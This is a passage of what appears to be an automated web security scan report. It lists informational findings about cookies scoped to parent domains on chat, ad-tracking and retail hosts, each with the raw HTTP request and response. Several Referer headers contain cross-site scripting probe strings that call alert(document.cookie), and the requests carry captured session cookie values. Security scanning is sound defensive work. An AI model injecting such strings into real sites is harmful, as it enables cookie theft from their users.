LivePersonID=-16101514677756-1305510918:-1:-1:-1:-1; expires=Tue, 15-May-2012 02:03:16 GMT; path=/hc/1402662; domain=.liveperson.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/1402662/?&site=1402662&cmd=mTagStartPage&lpCallId=336706150556-6703310413&protV=20&lpjson=1&page=http%3A//www.bluefly.com/&id=9169521417&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-bluefly-english&activePlugin=none&cobrowse=true&pageWindowName=1305510902500&PV%21unit=bluefly-english&PV%21BlockInvite=1&PV%21pageLoadTime=12%20sec&PV%21visitorActive=1&title=Bluefly%20-%20Designer%20Clothing%2C%20Handbags%2C%20Shoes%20%26%20Accessories%20%28Prada%2C%20Fendi%2C%20Gucci%20%26%20more%29%20at%20Discount%20Prices&cookie=SSID%3DAwCK-CkAAAAA6YPQTRybEAHpg9BNAQDpg9BNAAAAAAAAAADpg9BNAQA6AAAAWwQAAAI%3B%20SSSC%3D1.G5607126572844751644.1.58.1115%3B%20SSOD%3DAGHw_gAA%3B%20SSLB%3D1%3B%20SSRT%3D64PQTQE%3B%20TLTHID%3D7D2A76E47F5F107F24CCB1BBDF37F7B5%3B%20TLTSID%3D7D2A76E47F5F107F24CCB1BBDF37F7B5%3B%20JSESSIONID%3DONzgfawlrUIPLStla7ZseA**.bluefly_node4%3B%20_714bc2c9%3Dguest%3B%20CS_TRACKER_ID%3DONzgfawlrUIPLStla7ZseA**.bluefly_node4%3B%20TS18d374%3Df627709e7890e7b2182df7e64b5a37d2dc25568252c8426a4dd083eb%3B%20__utmz%3D9200358.1305510900.1.1.utmcsr%3D%28direct%29%7Cutmccn%3D%28direct%29%7Cutmcmd%3D%28none%29%3B%20__utma%3D9200358.576523501.1305510900.1305510900.1305510900.1%3B%20__utmc%3D9200358%3B%20__utmb%3D9200358.1.10.1305510900%3B%20cmTPSet%3DY%3B%20CoreAt%3D%3B%20mr_referredVisitor%3D0%3B%20bn_u%3D6923549130717770549%3B%20bn_cd%3Dd%2526g%2526s%2526r%253D0.1 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=8637489434147818322; LivePersonID=LP i=16101514677756,d=1305377522; ASPSESSIONIDASBBACST=BACHFIHAANHOFIJGPHFLPPDG; ASPSESSIONIDSQBBBCQB=AJBFJLFBKKLLCEBDLJEAJLLC; HumanClickACTIVE=1305510914551

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:03:16 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_1402662=STANDALONE; path=/hc/1402662
Set-Cookie: LivePersonID=-16101514677756-1305510918:-1:-1:-1:-1; expires=Tue, 15-May-2012 02:03:16 GMT; path=/hc/1402662; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 16 May 2011 02:03:16 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 186

lpConnLib.Process({"ResultSet": {"lpCallId":"336706150556-6703310413","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});

12.63. http://sales.liveperson.net/hc/46281118/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/46281118/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

LivePersonID=-16101514677756-1305510894:-1:-1:-1:-1; expires=Tue, 15-May-2012 02:01:39 GMT; path=/hc/46281118; domain=.liveperson.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/46281118/?&site=46281118&cmd=mTagStartPage&lpCallId=926428298465-128955706488&protV=20&lpjson=1&page=http%3A//www.petco.com/%3FAID%3D10413444%26PID%3D2537521%26cm_mmc%3DCJ-_-CID-_-2537521-_-10413444&id=2321407874&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-sales-petco-english&activePlugin=none&cobrowse=true&PV%21unit=sales-petco&PV%21pageLoadTime=46%20sec&PV%21visitorActive=1&SV%21language=english&title=Pet%20Supplies%20-%20Pet%20Products%20-%20Pet%20Food%20%7C%20PETCO.com&cobrowse=true&cookie=SL_Audience%3D423%7CAccelerated%7C92%7C7%7C0%3B%20SL_NV7%3D1%7C7%3B%20CMAVID%3Dnone%3B%20cmTPSet%3DY%3B%20VisitHistorySession%3D%3B%20VisitHistory%3DLastDirectVisitDate%3D5/15/2011%206%3A42%3A24%20PM%3B%20__utmz%3D215766422.1305510193.1.1.utmcsr%3D%28direct%29%7Cutmccn%3D%28direct%29%7Cutmcmd%3D%28none%29%3B%20RES_TRACKINGID%3D256672559073194%3B%20MP%3DCJ%3D1%26CJExpiry%3D6/19/2011%206%3A53%3A14%20PM%26CJ_AFFILIATEENTEREDDATE%3D5/15/2011%206%3A53%3A14%20PM%3B%20Basket%3DAffiliateCJExpiryDate%3D6/19/2011%206%3A53%3A14%20PM%26PID%3D2537521%26AID%3D10413444%3B%20SL_UVId%3D28F6BEFE806000C3%3B%20__utma%3D215766422.2089458932.1305510193.1305510193.1305510193.1%3B%20__utmc%3D215766422%3B%20__utmv%3D215766422.SL_TS_Accelerated%3B%20__utmb%3D215766422.2.10.1305510193%3B%20mt.v%3D1.1314269718.1305510194589%3B%20RES_SESSIONID%3D18709185067564%3B%20ResonanceSegment%3D2%3B%20CoreAt%3D90002311%3D1%7C2%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C1%7C1305510189%7C14_16_18_20_21_22_25_%7C%26%3B%20SASId%3Dsid%253DVbDccytV4V9vowfK3PHnkrtcS6teMKbe%253Bcsid%253D2%253Bnsid%253D0%253Blut%253D1305510840147%253B%3B%20SAVId%3Dvid%253DjAZPvJCAn9TzbA3IqjIS0BXWEqTAhP6H%253Bnvid%253D0%253Bcvid%253D1%253Bplen%253D88%253Bpid%253D55d11a247d01f4c640b3ba5752e78685d%253Bpdx%253D88%253Bglen%253D233%253Bgid%253Dc3089e6d97b75860d4a6aed45da60c42%253Bgdx%253D0%253Bpt%253D0%253B HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=-16101514677756-1305510216:-1:-1:-1:-1; HumanClickSiteContainerID_46281118=STANDALONE; HumanClickKEY=9049118658396575219; LivePersonID=LP i=16101514677756,d=1305377522; ASPSESSIONIDASBBACST=BACHFIHAANHOFIJGPHFLPPDG; HumanClickACTIVE=1305510890596

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:39 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_46281118=STANDALONE; path=/hc/46281118
Set-Cookie: LivePersonID=-16101514677756-1305510894:-1:-1:-1:-1; expires=Tue, 15-May-2012 02:01:39 GMT; path=/hc/46281118; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 16 May 2011 02:01:39 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 188

lpConnLib.Process({"ResultSet": {"lpCallId":"926428298465-128955706488","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});

12.64. http://sales.liveperson.net/hc/53965383/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/53965383/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

LivePersonID=-16101514677756-1305510911:-1:-1:-1:-1; expires=Tue, 15-May-2012 02:02:56 GMT; path=/hc/53965383; domain=.liveperson.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/53965383/?&site=53965383&cmd=mTagStartPage&lpCallId=767577826510-270394106628&protV=20&lpjson=1&page=http%3A//www.toshibadirect.com/td/b2c/laptops.to%3Fpage%3DsegHHO&id=4691856149&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-toshiba-english&activePlugin=none&cobrowse=true&PV%21unit=toshiba&PV%21language=english&PV%21Section=laptop&PV%21pageLoadTime=77%20sec&PV%21visitorActive=1&title=Toshiba%20Direct%20%7C%20Toshiba%20Laptop%20%26%20Notebook%20Computers&cobrowse=true&cookie=tais.current.segment%3DHHO%3B%20BV_IDS%3Dcccdadfdidkkkjmcgfkceghdgngdglo.0%3A@@@@1170188602.1305510022@@@@%3B%20s_vi%3D%5BCS%5Dv1%7C26E84051851D3EE4-40000143C043A343%5BCE%5D%3B%20ysm_CK1K17SBM0N76O75C93SIIUNQINTO%3Dysm_PV1K17SBM0N76O75C93SIIUNQINTO%3A2%26ysm_SN1K17SBM0N76O75C93SIIUNQINTO%3A1305510047274%26ysm_LD1K17SBM0N76O75C93SIIUNQINTO%3A0%3B%20s_pers%3D%2520s_vnum%253D1308102050353%252526vn%25253D1%257C1308102050353%253B%2520omtr_eVar45_cvp%253D%25255B%25255B%27Direct%25252520Load%27%25252C%271305510050403%27%25255D%25255D%257C1463362850403%253B%2520s_invisit%253Dtrue%257C1305512630631%253B%2520omtr_lv%253D1305510830635%257C1400118830635%253B%2520omtr_lv_s%253DFirst%252520Visit%257C1305512630635%253B%2520s_nr%253D1305510830639%257C1308102830639%253B%2520omtr_pv%253DSearch%25253ALaptops%252520Home%252520Page%257C1305512631142%253B%3B%20s_sess%3D%2520s_cc%253Dtrue%253B%2520SC_LINKS%253D%253B%2520omtr_eVar49%253DD%25253Dc49%253B%2520c_m%253DundefinedDirect%252520LoadDirect%252520Load%253B%2520s_sq%253D%253B%2520s_ppv%253D34%253B HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=-16101514677756-1305510079:-1:-1:-1:-1; HumanClickSiteContainerID_53965383=STANDALONE; HumanClickKEY=7617520773511781761; LivePersonID=LP i=16101514677756,d=1305377522; ASPSESSIONIDASBBACST=BACHFIHAANHOFIJGPHFLPPDG; HumanClickACTIVE=1305510908159

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:02:56 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_53965383=STANDALONE; path=/hc/53965383
Set-Cookie: LivePersonID=-16101514677756-1305510911:-1:-1:-1:-1; expires=Tue, 15-May-2012 02:02:56 GMT; path=/hc/53965383; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 16 May 2011 02:02:56 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 188

lpConnLib.Process({"ResultSet": {"lpCallId":"767577826510-270394106628","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});

12.65. http://seal-alaskaoregonwesternwashington.bbb.org/logo/rbhzbus/blue-nile-15026564.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://seal-alaskaoregonwesternwashington.bbb.org
Path:	/logo/rbhzbus/blue-nile-15026564.png

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

logolink=15026564; path=/; domain=alaskaoregonwesternwashington.bbb.org
logolink=15026564; path=/; domain=bbb.org

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /logo/rbhzbus/blue-nile-15026564.png HTTP/1.1
Host: seal-alaskaoregonwesternwashington.bbb.org
Proxy-Connection: keep-alive
Referer: http://www.bluenile.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:55:47 GMT
Server: Apache
Set-Cookie: logolink=15026564; path=/; domain=alaskaoregonwesternwashington.bbb.org
Set-Cookie: logolink=15026564; path=/; domain=bbb.org
Content-Disposition: inline; filename="seal-for-15026564.png"
Expires: Mon, 16 May 2011 06:28:51 GMT
Last-Modified: Sun, 15 May 2011 18:28:51 GMT
Etag: b69d8f80e55ef7e800faaca310c64b63
Content-Type: image/png
Content-Length: 8248

.PNG
.
...IHDR.......&........l....IDATx...y|......yf.d.I .CX." .,."...e...Z....m....R.....m..R.@.
(.. ..o YI&....s.?..Ib@H..V~......9..3s...9...D...h..{...........!..#T.m&...(?.....6...X.!...o..
...[SNIP]...

12.66. https://secure.bluenile.com/accounts/account-sign-in.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://secure.bluenile.com
Path:	/accounts/account-sign-in.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; Domain=.bluenile.com; Path=/
stc=3NZR3Q; Domain=.bluenile.com; Expires=Sat, 12-Nov-2011 02:06:40 GMT; Path=/
bncust=ver~1&SignInURL~http%3A%2F%2Fwww.bluenile.com%2F; Domain=.bluenile.com; Expires=Tue, 15-May-2012 02:06:40 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.67. http://segment-pixel.invitemedia.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://segment-pixel.invitemedia.com
Path:	/pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

segments_p1="eJzjYuFo2czIxcIx5y0jFxfHnn3MAv82n3vHwsXM8S8cAHevCXM=";Version=1;Path=/;Domain=invitemedia.com;Expires=Tue, 15-May-2012 10:42:26 GMT;Max-Age=31536000

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?pixelID=30364&partnerID=64&clientID=4391&key=segment HTTP/1.1
Host: segment-pixel.invitemedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f%27-alert(document.cookie)-%2782064d64928=1
Cookie: segments_p1="eJzjYuFo2czIxczxL5yLi2PPPmaBf5vPvWMBAEeMB9M="; uid=2ecd6c1e-5306-444b-942d-9108b17fd086; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjY4XSwgIjQiOiBbIkNBRVNFTHhJVnRkbXQzZEthZnMzRlQ4dDRRMCIsIDczNDI2N119; subID="{}"; impressions="{\"591269\": [1305111613+ \"2904264903406918006\"+ 184+ 789+ 926]+ \"591281\": [1305111351+ \"2727804715311744746\"+ 184+ 789+ 926]}"; camp_freq_p1=eJzjkuF49ZlFgEli742V71gUmDT2PwHSBkwW268BaQCvyAyE; io_freq_p1="eJzjkuY4HijAJLH3xsp3LAqMGj9BtAGTxfZrQBoAnC8L5w=="

Response

HTTP/1.1 302 Found
Date: Mon, 16 May 2011 10:42:26 GMT
Set-Cookie: segments_p1="eJzjYuFo2czIxcIx5y0jFxfHnn3MAv82n3vHwsXM8S8cAHevCXM=";Version=1;Path=/;Domain=invitemedia.com;Expires=Tue, 15-May-2012 10:42:26 GMT;Max-Age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Cache-Control: no-cache
Location: http://ad.yieldmanager.com/pixel?id=1057210&t=2
Content-Length: 0
Connection: close
Server: Jetty(7.3.1.v20110307)

12.68. http://srv.clickfuse.com/pixels/create.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://srv.clickfuse.com
Path:	/pixels/create.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

criteo=tagged; expires=Wed, 15-Jun-2011 02:02:58 GMT; path=/; domain=.clickfuse.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixels/create.php?name=criteo&expire=30 HTTP/1.1
Host: srv.clickfuse.com
Proxy-Connection: keep-alive
Referer: http://dis.us.criteo.com/dis/dis.aspx?p1=v%3D2%26wi%3D7712968%26pt1%3D0%26pt2%3D1&t1=sendEvent&p=2710&c=2&cb=40851379534
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Date: Mon, 16 May 2011 02:02:58 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR", policyref="/w3c/p3p.xml"
Server: Apache
Set-Cookie: criteo=tagged; expires=Wed, 15-Jun-2011 02:02:58 GMT; path=/; domain=.clickfuse.com
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.6
Connection: keep-alive
Content-Length: 42

GIF89a.............!.......,...........D..

12.69. http://srv2.wa.marketingsolutions.yahoo.com/script/ScriptServlet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://srv2.wa.marketingsolutions.yahoo.com
Path:	/script/ScriptServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SYSTEM_USER_ID=FLRTMBVOCL8UVKO69ABBTHN724; Domain=.wa.marketingsolutions.yahoo.com; Expires=Fri, 15-May-2015 10:41:20 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /script/ScriptServlet?aid=1K17SBM0N76O75C93SIIUNQINTO HTTP/1.1
Host: srv2.wa.marketingsolutions.yahoo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f%27-alert(document.cookie)-%2782064d64928=1
Cookie: B=ek8k2sl67ofpa&b=3&s=sm

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:41:20 GMT
P3P: policyref = "http://p3p.yahoo.com/w3c/p3p2.xml", CP = "NOI DSP COR CURa ADMo DEVa PSAa PSDa OUR BUS IND UNI PUR COM NAV INT STA"
Set-Cookie: SYSTEM_USER_ID=FLRTMBVOCL8UVKO69ABBTHN724; Domain=.wa.marketingsolutions.yahoo.com; Expires=Fri, 15-May-2015 10:41:20 GMT; Path=/
Expires: Mon, 16 May 2011 18:41:20 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript
Cache-Control: private
Content-Length: 8628

function ysm1(){}ysm1.prototype.ysm2=function(s){if(typeof(s)=='string'&&s!=null)return true;else return false;};ysm1.prototype.ysm3=function(o){if(typeof(o)=='object'&&o!=null)return true;else retur
...[SNIP]...

12.70. http://sync.mathtag.com/sync/img previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sync.mathtag.com
Path:	/sync/img

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ts=1305510879; domain=.mathtag.com; path=/; expires=Tue, 15-May-2012 01:54:39 GMT
mt_mop=5:1305510879|1:1305510843|9:1305510197; domain=.mathtag.com; path=/; expires=Tue, 15-May-2012 01:54:39 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sync/img?mt_exid=5&mt_exuid=4dd07bc8-e97b-118c-3dec-7b8c5c3065303452389e-4fca-41aa-bb8c-dae5ee1bcb77 HTTP/1.1
Host: sync.mathtag.com
Proxy-Connection: keep-alive
Referer: http://www.imiclk.com/cgi/r.cgi?m=3&mid=vj1j4Xj8&did=womens
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530; ts=1305510870; mt_mop=1:1305510843|5:1305510870|9:1305510197
If-None-Match: 4dd07bc8-e97b-118c-3dec-7b8c5c306530

Response

HTTP/1.1 200 OK
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x4 pid 0x413f 16703
Cache-Control: no-cache
Content-Type: image/gif
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Mon, 16 May 2011 01:54:39 GMT
Etag: 4dd07bc8-e97b-118c-3dec-7b8c5c306530
Connection: Keep-Alive
Set-Cookie: ts=1305510879; domain=.mathtag.com; path=/; expires=Tue, 15-May-2012 01:54:39 GMT
Set-Cookie: mt_mop=5:1305510879|1:1305510843|9:1305510197; domain=.mathtag.com; path=/; expires=Tue, 15-May-2012 01:54:39 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;

12.71. http://t.p.mybuys.com/webrec/wr.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://t.p.mybuys.com
Path:	/webrec/wr.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

mbc=sOgnt6NbgmSE4h1NwgmFVV1XNaZXwyoF; Domain=.mybuys.com; Expires=Sat, 03-Jun-2079 05:07:43 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.72. http://tags.mediaforge.com/if/50 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.mediaforge.com
Path:	/if/50

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uID=Cqo6g03RAWdt2gOeC3Z5Ag==; expires=Tue, 15-May-12 10:50:15 GMT; domain=.mediaforge.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /if/50 HTTP/1.1
Host: tags.mediaforge.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.petsmart.com/?5f832--%3E%3Cscript%3Ealert(1)%3C/script%3E3105c4c3d6e=1

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/plain
Content-Type: text/html
Date: Mon, 16 May 2011 10:50:15 GMT
P3P: policyref="/p3p.xml", CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"
P3P: policyref="/p3p.xml", CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"
PRAGMA: no-cache
Server: nginx/0.8.53
Set-Cookie: uID=Cqo6g03RAWdt2gOeC3Z5Ag==; expires=Tue, 15-May-12 10:50:15 GMT; domain=.mediaforge.com; path=/
Content-Length: 1443
Connection: keep-alive

<html lang="en-US"><head> <meta charset="UTF-8"> <title></title></head><body> <div id="mf_div"></div> <script type="text/javascript"> var _mf_tag = { "init": function() { var id = 'mf_div';
...[SNIP]...

12.73. http://tracking.searchmarketing.com/welcome.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tracking.searchmarketing.com
Path:	/welcome.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SM=GUID=fa433a73%2Dbf27%2D4138%2Da8d5%2D3b0465040499&AID=&LastVisitDate=5%2F15%2F2011+9%3A53%3A40+PM&SMCID=335; expires=Tue, 14-Jun-2011 04:00:00 GMT; domain=searchmarketing.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /welcome.asp?SMCID=335&x= HTTP/1.1
Host: tracking.searchmarketing.com
Proxy-Connection: keep-alive
Referer: http://www.guitarcenter.com/?CJAID=10453836&CJPID=2537521
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDABCAC=DHOEMODALDECLOEFAICIABBD; ASPSESSIONIDQARDDBAD=CIPBBPDABBMIADGEALJIDLAH; ASPSESSIONIDSAQCDDDB=LPIJBAEAIIJKBDGLBMKCEIBP; SM=GUID=fa433a73%2Dbf27%2D4138%2Da8d5%2D3b0465040499&AID=&LastVisitDate=5%2F15%2F2011+9%3A43%3A18+PM&SMCID=208

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP=CAO DSP COR CUR ADM DEV TAI PSD IVD CONi OUR DEL OTRo IND
Content-Length: 49
Content-Type: image/GIF
Set-Cookie: SM=GUID=fa433a73%2Dbf27%2D4138%2Da8d5%2D3b0465040499&AID=&LastVisitDate=5%2F15%2F2011+9%3A53%3A40+PM&SMCID=335; expires=Tue, 14-Jun-2011 04:00:00 GMT; domain=searchmarketing.com; path=/
Set-Cookie: ASPSESSIONIDQQCDBDDC=GGABBBEAJKJGPEAHHBLHBFPE; path=/
Cache-control: private

GIF89a...................!.......,...........T..;

12.74. http://uat.netmng.com/pixel/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://uat.netmng.com
Path:	/pixel/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

evo5=csmq4atf04cxa%7CJeuRJCb45V6uwY1xci0duejpNnUE%2BOmzqGMogMAW%2FNCOqkjFJeQTtSSwFM8SExogUBVq3aRXr6rOPcqNTmIC7EZV1nRS%2FfrPyazw99gyUAJXaI4v2Tf%2FYK%2FYCGNRiTDa8FIC%2F1rDdFnvxSKmwnP9%2FzSswr%2BFnZEedqWLNPmJOGiD%2BKTS14anDruAemPci57rfbGvxyPHPZwrhH9c2PC0R7Ymr8xiYKFUBnazCBzOBnL2qGd20SpExMUheTADl1d0TTjVbjvJQVia2%2BYow6VA05s7EZxex6vE%2BvmQgXxXWwR2mefK966%2FeFMgLbGnQsm5mGE5l%2BYsVCNKIKht%2BM7JXtn8nweceJeqZuNgJnNvN7mezkeiy1MIOhXMGKv%2BHUozybOtALE61aKDO%2BSoPj%2BhNGduTlw4jjewTANsUadm4eJQ75KAJA1KpHCSrfNDIRnHjMMAwYuzMxzJA7OiUPCwQbVx7hAHs0TdLiuv7ZzwK309%2BcMucPBVwOOwAyb9yajE; expires=Tue, 15-Nov-2011 01:54:21 GMT; path=/; domain=.netmng.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/?aid=274&tax=womens HTTP/1.1
Host: uat.netmng.com
Proxy-Connection: keep-alive
Referer: http://www.armaniexchange.com/category/womens.do
